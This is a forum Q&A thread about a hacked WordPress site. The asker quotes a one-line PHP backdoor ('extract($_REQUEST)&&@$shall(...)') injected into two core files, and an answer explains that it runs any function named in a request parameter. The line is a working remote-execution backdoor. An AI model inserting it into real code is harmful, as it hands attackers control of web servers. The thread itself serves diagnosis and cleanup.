# PHP/WordPress: our site broke with the following code in the files

Tags: php, wordpress

Any help is very appreciated.

Short story:

I would like some help trying to understand what this line of code is intended to do.

```
extract($_REQUEST)&&@$shall(stripslashes($shall))&&exit;
```

I deciphered most of it except the `$shall` part. `$shall` does not appear anywhere else and I did not go into details of reading WordPress code.

The line appeared in the below files as the first line right after <?php

Long story:

I have a site that runs on WordPress and it randomly broke with errors in 2 WordPress files. The filenames are

> .../wp-includes/rest-api/endpoints/class-wp-rest-revisions-controller.php
>
> .../wp-includes/blocks/block.php

It is not present in WordPress GitLab file versions. We did not initiate any WordPress updates, etc.  I commented out the line in both files and all is back to normal.

Any ideas as to how/why/for what purpose this line would appear there?

Answer (score 2):

If `($_REQUEST['shall']="something")` then `$shall` will equal string `'something'` after the `extract` part. If there's a function called `something` it *will* execute. So basically all wordpress functions are available for this script. This is a back door for a malware no doubt. Not good.

Search in google found record of the file name [somewhere](https://wordpress.org/support/topic/pgj-877-21033-urgent-malware-abuse-report-for/), however before you remove it be ready for it to re-appear if you haven't fixed your vulnerabilities.

Comment: Troubling, thank you for a fast response!

Comment: Just as a follow up....
This was a major hack, took about 10 hours and 70+ files to be cleaned.

Comment: Thanks for the update. It indeed was troubling. I wish you it says clean for the following days

Answer (score 0):

This is a malware and remove the code part from the file. Then it works for me